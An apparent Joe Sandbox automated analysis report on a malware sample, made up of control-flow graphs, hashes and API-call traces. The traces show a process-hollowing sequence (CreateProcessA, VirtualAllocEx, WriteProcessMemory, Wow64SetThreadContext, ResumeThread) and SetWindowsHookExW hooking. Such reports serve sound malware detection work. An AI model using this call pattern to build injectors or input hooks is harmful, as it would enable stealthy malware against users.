                                                                                          control_flow_graph 63 2f28c9-2f2901 64 2f2908-2f3054 call 2f1c00 * 12 call 2f1ca8 * 10 63->64 65 2f2903 63->65 150 2f305b-2f3090 64->150 151 2f3056 64->151 65->64 153 2f30bb-2f30e5 150->153 154 2f3092-2f30b5 150->154 151->150 305 2f30e8 call 2f3b1d 153->305 306 2f30e8 call 2f3b28 153->306 154->153 155 2f30ea-2f310a 157 2f310c-2f3127 155->157 158 2f3132-2f315f 155->158 157->158 161 2f3166-2f31ab 158->161 162 2f3161 158->162 166 2f31ad 161->166 167 2f31b2-2f31de 161->167 162->161 166->167 169 2f3243-2f327a 167->169 170 2f31e0-2f3217 167->170 173 2f327c-2f3297 169->173 174 2f32a2-2f32ad 169->174 175 2f323f-2f3241 170->175 176 2f3219-2f3234 170->176 173->174 177 2f32af 174->177 178 2f32b4-2f32cd 174->178 175->174 176->175 177->178 181 2f32cf 178->181 182 2f32d4-2f3316 178->182 181->182 186 2f333e-2f334b 182->186 187 2f3318-2f3333 182->187 188 2f334d-2f336e 186->188 189 2f3370-2f3379 186->189 187->186 188->189 198 2f337b 188->198 191 2f3385-2f339a 189->191 192 2f339c-2f33b7 191->192 193 2f33c2-2f33d0 191->193 192->193 195 2f33d7-2f33fe 193->195 196 2f33d2 193->196 202 2f3405-2f343e 195->202 203 2f3400 195->203 196->195 198->191 311 2f3441 call 2f48b8 202->311 312 2f3441 call 2f48b1 202->312 203->202 205 2f3443-2f345b 206 2f345d-2f3464 205->206 207 2f3466-2f346f 205->207 206->207 208 2f3471 206->208 209 2f347b-2f3490 207->209 208->209 210 2f34d4-2f34ef 209->210 211 2f3492-2f34ce 209->211 212 2f3517-2f353a 210->212 213 2f34f1-2f350c 210->213 211->210 303 2f353d call 2f4658 212->303 304 2f353d call 2f4660 212->304 213->212 215 2f353f-2f355f 217 2f3587-2f3595 215->217 218 2f3561-2f357c 215->218 220 2f359c-2f35af 217->220 221 2f3597 217->221 218->217 223 2f35b6-2f35d0 220->223 224 2f35b1 220->224 221->220 227 2f35d7-2f35dc 223->227 228 2f35d2 223->228 224->223 229 2f35de 227->229 230 2f35e3-2f35fe 227->230 228->227 229->230 231 2f37e1-2f37f9 230->231 232 2f37ff-2f3829 231->232 233 2f3603-2f3610 231->233 237 2f382b 232->237 238 2f3830-2f384c 232->238 234 2f3617-2f363e 233->234 235 2f3612 233->235 240 2f3645-2f366c 234->240 241 2f3640 234->241 235->234 237->238 308 2f384f call 2f4658 238->308 309 2f384f call 2f4660 238->309 246 2f366e 240->246 247 2f3673-2f36a7 240->247 241->240 242 2f3851-2f3871 244 2f3899-2f38a7 242->244 245 2f3873-2f388e 242->245 248 2f38ae-2f38db 244->248 249 2f38a9 244->249 245->244 246->247 255 2f36ad-2f36ba 247->255 256 2f37ab-2f37b9 247->256 253 2f38dd-2f38e3 248->253 254 2f38e9-2f38f6 248->254 249->248 253->254 258 2f38fd-2f390d 254->258 259 2f38f8 254->259 262 2f36bc 255->262 263 2f36c1-2f36c8 255->263 260 2f37bb 256->260 261 2f37c0-2f37d4 256->261 264 2f390f 258->264 265 2f3914-2f3945 258->265 259->258 260->261 266 2f37db 261->266 267 2f37d6 261->267 262->263 268 2f36cf-2f36d6 263->268 269 2f36ca 263->269 264->265 275 2f39ad-2f39e7 265->275 276 2f3947-2f395f call 2f4000 265->276 266->231 267->266 270 2f36dd-2f36e4 268->270 271 2f36d8 268->271 269->268 272 2f36eb-2f3733 270->272 273 2f36e6 270->273 271->270 285 2f373a-2f375d 272->285 286 2f3735 272->286 273->272 283 2f3a0f-2f3a1f call 2f49d8 275->283 284 2f39e9-2f3a04 275->284 279 2f3961-2f3981 276->279 280 2f39a9-2f39ab 279->280 281 2f3983-2f399e 279->281 280->283 281->280 288 2f3a21-2f3a41 283->288 284->283 313 2f3760 call 2f4658 285->313 314 2f3760 call 2f4660 285->314 286->285 290 2f3a69-2f3b0e 288->290 291 2f3a43-2f3a5e 288->291 291->290 292 2f3762-2f3782 293 2f37aa 292->293 294 2f3784-2f379f 292->294 293->256 294->293 303->215 304->215 305->155 306->155 308->242 309->242 311->205 312->205 313->292 314->292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .@Fl
                                                                                          • API String ID: 0-4078194465
                                                                                          • Opcode ID: 8533dfcd0c503856c15572adf80bc6317c085a5d3aca5b13066833a37fbce3ea
                                                                                          • Instruction ID: 3485987ee46beb1138e7711217d7101e5cbf8343d87afb0f95269a07d4fa203e
                                                                                          • Opcode Fuzzy Hash: 8533dfcd0c503856c15572adf80bc6317c085a5d3aca5b13066833a37fbce3ea
                                                                                          • Instruction Fuzzy Hash: 3AA2FE74A452298FEB64DF24C994BEDB7B2AB89304F1080EAD50DA7395DB319EC1CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 557 2f2068-2f2094 558 2f209b-2f2100 557->558 559 2f2096 557->559 561 2f221f-2f2239 558->561 562 2f2106-2f213e 558->562 559->558 567 2f223f-2f226b 561->567 568 2f2334-2f2357 561->568 563 2f2145-2f217e 562->563 564 2f2140 562->564 574 2f2185-2f2193 563->574 575 2f2180 563->575 564->563 569 2f226d 567->569 570 2f2272-2f2299 567->570 576 2f25a9-2f25b5 568->576 569->570 584 2f229b 570->584 585 2f22a0-2f22ae 570->585 577 2f219a-2f21d3 574->577 578 2f2195 574->578 575->574 579 2f235c-2f237f 576->579 580 2f25bb-2f25c5 576->580 594 2f21da-2f21e8 577->594 595 2f21d5 577->595 578->577 587 2f2386-2f2391 579->587 588 2f2381 579->588 582 2f25c7-2f25d4 580->582 584->585 589 2f22b5-2f22e8 585->589 590 2f22b0 585->590 592 2f2398-2f239d 587->592 593 2f2393 587->593 588->587 603 2f22ef-2f22fd 589->603 604 2f22ea 589->604 590->589 596 2f239f 592->596 597 2f23a4-2f23dc 592->597 593->592 599 2f21ef-2f2219 594->599 600 2f21ea 594->600 595->594 596->597 612 2f23de 597->612 613 2f23e3-2f240f call 2f25d8 597->613 599->561 600->599 606 2f22ff 603->606 607 2f2304-2f232e 603->607 604->603 606->607 607->568 612->613 617 2f2415-2f2453 613->617 620 2f245a-2f2486 617->620 621 2f2455 617->621 623 2f248d-2f2498 620->623 624 2f2488 620->624 621->620 625 2f249f-2f24a4 623->625 626 2f249a 623->626 624->623 627 2f24ab-2f2506 625->627 628 2f24a6 625->628 626->625 633 2f259c-2f25a2 627->633 634 2f250c-2f252f 627->634 628->627 633->576 635 2f25a4 633->635 637 2f2536-2f2541 634->637 638 2f2531 634->638 635->576 639 2f2548-2f254d 637->639 640 2f2543 637->640 638->637 641 2f254f 639->641 642 2f2554-2f258c 639->642 640->639 641->642 646 2f258e 642->646 647 2f2593-2f259a 642->647 646->647 647->582
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ea07f3681bdae6bded9a5283f4174a035fc70686c138db6e2cef4df775e5a92
                                                                                          • Instruction ID: 7b07ea2e1c26e1e2b493232f33cfd8e211c580f16b3727392b0aee1c802a92be
                                                                                          • Opcode Fuzzy Hash: 3ea07f3681bdae6bded9a5283f4174a035fc70686c138db6e2cef4df775e5a92
                                                                                          • Instruction Fuzzy Hash: 13F13EB4E04219CFDB58DFA4C994BEEB7B2AF88315F54C069DA08A7340DB349A85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 315 2f3b1d-2f3bc1 318 2f3c23-2f3c4b 315->318 319 2f3bc3-2f3bf3 315->319 322 2f3c4d-2f3c7a 318->322 323 2f3caa-2f3d00 318->323 319->318 326 2f3bf5-2f3bfa 319->326 322->323 335 2f3c7c-2f3c81 322->335 330 2f3d5f-2f3e4d CreateProcessA 323->330 331 2f3d02-2f3d2f 323->331 328 2f3c1d-2f3c20 326->328 329 2f3bfc-2f3c06 326->329 328->318 333 2f3c0a-2f3c19 329->333 334 2f3c08 329->334 355 2f3e4f-2f3e55 330->355 356 2f3e56-2f3f3b 330->356 331->330 345 2f3d31-2f3d36 331->345 333->333 336 2f3c1b 333->336 334->333 339 2f3ca4-2f3ca7 335->339 340 2f3c83-2f3c8d 335->340 336->328 339->323 342 2f3c8f 340->342 343 2f3c91-2f3ca0 340->343 342->343 343->343 346 2f3ca2 343->346 347 2f3d59-2f3d5c 345->347 348 2f3d38-2f3d42 345->348 346->339 347->330 350 2f3d46-2f3d55 348->350 351 2f3d44 348->351 350->350 352 2f3d57 350->352 351->350 352->347 355->356 368 2f3f3d-2f3f41 356->368 369 2f3f4b-2f3f4f 356->369 368->369 372 2f3f43 368->372 370 2f3f5f-2f3f63 369->370 371 2f3f51-2f3f55 369->371 374 2f3f65-2f3f69 370->374 375 2f3f73-2f3f77 370->375 371->370 373 2f3f57 371->373 372->369 373->370 374->375 376 2f3f6b 374->376 377 2f3fad-2f3fb8 375->377 378 2f3f79-2f3fa2 375->378 376->375 382 2f3fb9 377->382 378->377 382->382
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F3E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: c14877d595b15a6a32d5942af5b40a781ff64f9caa357cd325258cfddc722bcb
                                                                                          • Instruction ID: 5fc63c21fdda91c7f41fcc1198a350ddbbdea126ba1352673222e905e016686b
                                                                                          • Opcode Fuzzy Hash: c14877d595b15a6a32d5942af5b40a781ff64f9caa357cd325258cfddc722bcb
                                                                                          • Instruction Fuzzy Hash: B6D15670D1421D8FDB20CFA8C845BEDBBB1BF49314F0095AAE909B7280DB749A95CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 383 2f3b28-2f3bc1 385 2f3c23-2f3c4b 383->385 386 2f3bc3-2f3bf3 383->386 389 2f3c4d-2f3c7a 385->389 390 2f3caa-2f3d00 385->390 386->385 393 2f3bf5-2f3bfa 386->393 389->390 402 2f3c7c-2f3c81 389->402 397 2f3d5f-2f3e4d CreateProcessA 390->397 398 2f3d02-2f3d2f 390->398 395 2f3c1d-2f3c20 393->395 396 2f3bfc-2f3c06 393->396 395->385 400 2f3c0a-2f3c19 396->400 401 2f3c08 396->401 422 2f3e4f-2f3e55 397->422 423 2f3e56-2f3f3b 397->423 398->397 412 2f3d31-2f3d36 398->412 400->400 403 2f3c1b 400->403 401->400 406 2f3ca4-2f3ca7 402->406 407 2f3c83-2f3c8d 402->407 403->395 406->390 409 2f3c8f 407->409 410 2f3c91-2f3ca0 407->410 409->410 410->410 413 2f3ca2 410->413 414 2f3d59-2f3d5c 412->414 415 2f3d38-2f3d42 412->415 413->406 414->397 417 2f3d46-2f3d55 415->417 418 2f3d44 415->418 417->417 419 2f3d57 417->419 418->417 419->414 422->423 435 2f3f3d-2f3f41 423->435 436 2f3f4b-2f3f4f 423->436 435->436 439 2f3f43 435->439 437 2f3f5f-2f3f63 436->437 438 2f3f51-2f3f55 436->438 441 2f3f65-2f3f69 437->441 442 2f3f73-2f3f77 437->442 438->437 440 2f3f57 438->440 439->436 440->437 441->442 443 2f3f6b 441->443 444 2f3fad-2f3fb8 442->444 445 2f3f79-2f3fa2 442->445 443->442 449 2f3fb9 444->449 445->444 449->449
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F3E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: f52597869ccf3de2e3f8914161e2573df9be2ff51cd318aa90cecb1a1e4ea423
                                                                                          • Instruction ID: e53c0613605dd71903308daf671ac8af1768716d199794fb983bc428f562e75b
                                                                                          • Opcode Fuzzy Hash: f52597869ccf3de2e3f8914161e2573df9be2ff51cd318aa90cecb1a1e4ea423
                                                                                          • Instruction Fuzzy Hash: EFD15770D1421D8FDB20CFA8C845BEDBBB1BF49314F0095AAE509B7280DB749A95CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 450 2f4658-2f46cb 453 2f46cd-2f46df 450->453 454 2f46e2-2f4743 WriteProcessMemory 450->454 453->454 456 2f474c-2f479e 454->456 457 2f4745-2f474b 454->457 457->456
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 002F4733
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: e45e77d8c8d071ca51943ddaf3d1da944b353f35d0fc298e2553869f706e3c88
                                                                                          • Instruction ID: eef7c117612249324f3577861779559138df02223e820b057253e047b296e24a
                                                                                          • Opcode Fuzzy Hash: e45e77d8c8d071ca51943ddaf3d1da944b353f35d0fc298e2553869f706e3c88
                                                                                          • Instruction Fuzzy Hash: 7841BBB4D012489FCB00DFA9D984AEEFBF1BB49314F10942AE914B7210D778AA45CB64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 462 2f4660-2f46cb 464 2f46cd-2f46df 462->464 465 2f46e2-2f4743 WriteProcessMemory 462->465 464->465 467 2f474c-2f479e 465->467 468 2f4745-2f474b 465->468 468->467
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 002F4733
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 2ebb05c9bdad42a6695a7d0ff76ce299a4590ccfec46a98a8d0cdb76d454ca70
                                                                                          • Instruction ID: e716b3e668c6f511a6330d18948e0521db82c06a64004ba0c777911f669593a5
                                                                                          • Opcode Fuzzy Hash: 2ebb05c9bdad42a6695a7d0ff76ce299a4590ccfec46a98a8d0cdb76d454ca70
                                                                                          • Instruction Fuzzy Hash: 1F41BAB4D012489FCF00DFA9D984AEEFBF1BB49314F20942AE918B7210D774AA45CF54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 473 2f48b1-2f4972 VirtualAllocEx 476 2f497b-2f49c5 473->476 477 2f4974-2f497a 473->477 477->476
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 002F4962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: aa06765f625013d96d4cdac36425989ccfc039e5a47b4f1475988215676619c7
                                                                                          • Instruction ID: a7056ad6c5334dc6adc5ac9dff9cf6345a49acfb456f986109956cf490b16619
                                                                                          • Opcode Fuzzy Hash: aa06765f625013d96d4cdac36425989ccfc039e5a47b4f1475988215676619c7
                                                                                          • Instruction Fuzzy Hash: 804197B4D042489FCF10CFA9D884AEEFBB1AB49314F10A42AE915B7210D775A946CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 482 2f48b8-2f4972 VirtualAllocEx 485 2f497b-2f49c5 482->485 486 2f4974-2f497a 482->486 486->485
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 002F4962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: c7a446644d551a3f3560594a939b97fc452902eab0f964ca1c691fcd0d6ae92f
                                                                                          • Instruction ID: 154ab02d07d01bd4e21799f54e14c1c717597eb6db14a3948747da54e6ee21e9
                                                                                          • Opcode Fuzzy Hash: c7a446644d551a3f3560594a939b97fc452902eab0f964ca1c691fcd0d6ae92f
                                                                                          • Instruction Fuzzy Hash: DC3197B4E002489FCF00CFA9D884AAEFBB1BB49310F10A42AE914B7310D775A945CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 491 2f4000-2f4060 493 2f4077-2f40bf Wow64SetThreadContext 491->493 494 2f4062-2f4074 491->494 496 2f40c8-2f4114 493->496 497 2f40c1-2f40c7 493->497 494->493 497->496
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 002F40AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 2952d8ca8f43c2965a256051fffbe527670ecbf42ef232b973b6f345110d0433
                                                                                          • Instruction ID: 72537885aa6453c8b5cce24e6d1d8876b1537f1bfa6c6e55d47e3856c6c04f4b
                                                                                          • Opcode Fuzzy Hash: 2952d8ca8f43c2965a256051fffbe527670ecbf42ef232b973b6f345110d0433
                                                                                          • Instruction Fuzzy Hash: 3E31DCB4D002589FCB10CFA9D884AEEFBF0BF49314F14842AE508B7240D778A949CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 502 2f49d8-2f4a66 ResumeThread 505 2f4a6f-2f4ab1 502->505 506 2f4a68-2f4a6e 502->506 506->505
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 3a2e6ec800d04eb8830a506ee20ead5fe6e82dadac8e514707828b66ea58d333
                                                                                          • Instruction ID: ab33feeb7f5c7304db5db5d2cf7f44d5442c328f9442567032f3f07d0420adaf
                                                                                          • Opcode Fuzzy Hash: 3a2e6ec800d04eb8830a506ee20ead5fe6e82dadac8e514707828b66ea58d333
                                                                                          • Instruction Fuzzy Hash: 1031CAB4D0125C9FCB10CFA9D884AAEFBB0AF49314F10982AE918B7300D775A901CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.927808510.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_2f0000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3895926f5dfaf85f2b94f237a65972ada1e5aecbe919f33653fab4abf3b7ce6a
                                                                                          • Instruction ID: d97e31c1e430ff9ceb3ecbde1ed5174aecadbbff1b2ab9696477f25d4851b8ec
                                                                                          • Opcode Fuzzy Hash: 3895926f5dfaf85f2b94f237a65972ada1e5aecbe919f33653fab4abf3b7ce6a
                                                                                          • Instruction Fuzzy Hash: 5E9129B4E042188FDB58DFA9C884BEEB7B6AF89315F44C479DA08E7341DB345A848F51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:26%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:402
                                                                                          Total number of Limit Nodes:10
                                                                                          execution_graph 32045 5a0448 32049 5a0455 32045->32049 32046 5a0467 32050 5a5b3d 32049->32050 32055 5a5a99 32049->32055 32051 5a5b44 32050->32051 32052 5a5c70 32051->32052 32063 b034e1 32051->32063 32068 b034e8 32051->32068 32052->32046 32056 5a5ac8 32055->32056 32081 5a6140 32056->32081 32085 5a6244 32056->32085 32057 5a5c70 32057->32046 32058 5a5b3b 32058->32057 32061 b034e1 2 API calls 32058->32061 32062 b034e8 2 API calls 32058->32062 32061->32057 32062->32057 32064 b03502 32063->32064 32065 b03546 32064->32065 32073 b036d1 32064->32073 32077 b036d8 32064->32077 32065->32052 32069 b03502 32068->32069 32070 b03546 32069->32070 32071 b036d1 SetWindowsHookExW 32069->32071 32072 b036d8 SetWindowsHookExW 32069->32072 32070->32052 32071->32069 32072->32069 32075 b0371c SetWindowsHookExW 32073->32075 32076 b03762 32075->32076 32076->32064 32080 b0371c SetWindowsHookExW 32077->32080 32079 b03762 32079->32064 32080->32079 32083 5a6149 32081->32083 32082 5a623d 32082->32058 32083->32082 32090 5a68d9 32083->32090 32086 5a6252 32085->32086 32088 5a6149 32085->32088 32087 5a623d 32087->32058 32088->32087 32089 5a68d9 22 API calls 32088->32089 32089->32088 32091 5a6907 32090->32091 32092 5a692f 32091->32092 32129 5a7fa7 32091->32129 32134 5a7a27 32091->32134 32144 5a7c20 32091->32144 32152 5a7f23 32091->32152 32160 5a7caa 32091->32160 32168 5a7d37 32091->32168 32176 5a7ab1 32091->32176 32186 5a7739 32091->32186 32199 5a76b8 32091->32199 32212 5a7b0c 32091->32212 32220 5a7e0f 32091->32220 32228 5a7889 32091->32228 32238 5a7808 32091->32238 32251 5a7b96 32091->32251 32259 5a7e93 32091->32259 32267 5a7913 32091->32267 32277 5a799d 32091->32277 32287 5a7c65 32091->32287 32295 5a79e2 32091->32295 32305 5a7a6c 32091->32305 32315 5a7cef 32091->32315 32323 5a76f4 32091->32323 32336 5a7673 32091->32336 32349 5a7d7f 32091->32349 32357 5a777e 32091->32357 32370 5a7dc7 32091->32370 32378 5a77c3 32091->32378 32391 5a784d 32091->32391 32404 5a78ce 32091->32404 32414 5a7e4b 32091->32414 32422 5a7b51 32091->32422 32430 5a7652 KiUserExceptionDispatcher 32091->32430 32443 5a7f5f 32091->32443 32451 5a7958 32091->32451 32461 5a7edb 32091->32461 32469 5a7bdb 32091->32469 32130 5a7fb8 32129->32130 32131 5a7fd4 32130->32131 32477 a8aff0 32130->32477 32481 a8af91 32130->32481 32131->32092 32135 5a7a38 32134->32135 32136 5a7ad5 KiUserExceptionDispatcher 32135->32136 32137 5a7af1 32136->32137 32140 a8aff0 RegQueryValueExW 32137->32140 32141 a8af91 RegQueryValueExW 32137->32141 32138 5a7f8c 32139 5a7fd4 32138->32139 32142 a8aff0 RegQueryValueExW 32138->32142 32143 a8af91 RegQueryValueExW 32138->32143 32139->32092 32140->32138 32141->32138 32142->32139 32143->32139 32145 5a7c31 32144->32145 32148 a8aff0 RegQueryValueExW 32145->32148 32149 a8af91 RegQueryValueExW 32145->32149 32146 5a7f8c 32147 5a7fd4 32146->32147 32150 a8aff0 RegQueryValueExW 32146->32150 32151 a8af91 RegQueryValueExW 32146->32151 32147->32092 32148->32146 32149->32146 32150->32147 32151->32147 32153 5a7f34 32152->32153 32156 a8aff0 RegQueryValueExW 32153->32156 32157 a8af91 RegQueryValueExW 32153->32157 32154 5a7f8c 32155 5a7fd4 32154->32155 32158 a8aff0 RegQueryValueExW 32154->32158 32159 a8af91 RegQueryValueExW 32154->32159 32155->32092 32156->32154 32157->32154 32158->32155 32159->32155 32161 5a7cbb 32160->32161 32164 a8aff0 RegQueryValueExW 32161->32164 32165 a8af91 RegQueryValueExW 32161->32165 32162 5a7f8c 32163 5a7fd4 32162->32163 32166 a8aff0 RegQueryValueExW 32162->32166 32167 a8af91 RegQueryValueExW 32162->32167 32163->32092 32164->32162 32165->32162 32166->32163 32167->32163 32169 5a7d48 32168->32169 32172 a8aff0 RegQueryValueExW 32169->32172 32173 a8af91 RegQueryValueExW 32169->32173 32170 5a7f8c 32171 5a7fd4 32170->32171 32174 a8aff0 RegQueryValueExW 32170->32174 32175 a8af91 RegQueryValueExW 32170->32175 32171->32092 32172->32170 32173->32170 32174->32171 32175->32171 32177 5a7ac2 KiUserExceptionDispatcher 32176->32177 32179 5a7af1 32177->32179 32182 a8aff0 RegQueryValueExW 32179->32182 32183 a8af91 RegQueryValueExW 32179->32183 32180 5a7f8c 32181 5a7fd4 32180->32181 32184 a8aff0 RegQueryValueExW 32180->32184 32185 a8af91 RegQueryValueExW 32180->32185 32181->32092 32182->32180 32183->32180 32184->32181 32185->32181 32187 5a774a 32186->32187 32488 a83050 32187->32488 32493 a82ff0 32187->32493 32188 5a786e 32189 5a7ad5 KiUserExceptionDispatcher 32188->32189 32190 5a7af1 32189->32190 32197 a8aff0 RegQueryValueExW 32190->32197 32198 a8af91 RegQueryValueExW 32190->32198 32191 5a7f8c 32192 5a7fd4 32191->32192 32193 a8aff0 RegQueryValueExW 32191->32193 32194 a8af91 RegQueryValueExW 32191->32194 32192->32092 32193->32192 32194->32192 32197->32191 32198->32191 32200 5a76c9 32199->32200 32206 a83050 2 API calls 32200->32206 32207 a82ff0 2 API calls 32200->32207 32201 5a786e 32202 5a7ad5 KiUserExceptionDispatcher 32201->32202 32203 5a7af1 32202->32203 32208 a8aff0 RegQueryValueExW 32203->32208 32209 a8af91 RegQueryValueExW 32203->32209 32204 5a7f8c 32205 5a7fd4 32204->32205 32210 a8aff0 RegQueryValueExW 32204->32210 32211 a8af91 RegQueryValueExW 32204->32211 32205->32092 32206->32201 32207->32201 32208->32204 32209->32204 32210->32205 32211->32205 32213 5a7b1d 32212->32213 32216 a8aff0 RegQueryValueExW 32213->32216 32217 a8af91 RegQueryValueExW 32213->32217 32214 5a7f8c 32215 5a7fd4 32214->32215 32218 a8aff0 RegQueryValueExW 32214->32218 32219 a8af91 RegQueryValueExW 32214->32219 32215->32092 32216->32214 32217->32214 32218->32215 32219->32215 32221 5a7e20 32220->32221 32224 a8aff0 RegQueryValueExW 32221->32224 32225 a8af91 RegQueryValueExW 32221->32225 32222 5a7f8c 32223 5a7fd4 32222->32223 32226 a8aff0 RegQueryValueExW 32222->32226 32227 a8af91 RegQueryValueExW 32222->32227 32223->32092 32224->32222 32225->32222 32226->32223 32227->32223 32229 5a789a 32228->32229 32230 5a7ad5 KiUserExceptionDispatcher 32229->32230 32231 5a7af1 32230->32231 32234 a8aff0 RegQueryValueExW 32231->32234 32235 a8af91 RegQueryValueExW 32231->32235 32232 5a7f8c 32233 5a7fd4 32232->32233 32236 a8aff0 RegQueryValueExW 32232->32236 32237 a8af91 RegQueryValueExW 32232->32237 32233->32092 32234->32232 32235->32232 32236->32233 32237->32233 32239 5a7819 32238->32239 32245 a83050 2 API calls 32239->32245 32246 a82ff0 2 API calls 32239->32246 32240 5a786e 32241 5a7ad5 KiUserExceptionDispatcher 32240->32241 32242 5a7af1 32241->32242 32247 a8aff0 RegQueryValueExW 32242->32247 32248 a8af91 